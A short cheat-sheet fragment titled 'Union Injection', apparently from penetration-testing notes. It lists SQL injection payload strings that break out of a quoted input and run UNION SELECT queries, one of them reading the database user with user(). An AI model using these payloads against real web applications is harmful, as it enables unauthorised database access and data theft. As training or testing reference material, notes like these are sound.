Union Injection

Using UNION

abc' # any string not listed
UNION 
select 1,2,3-- 
cn' UNION select 1,user(),3,4-- 

Last updated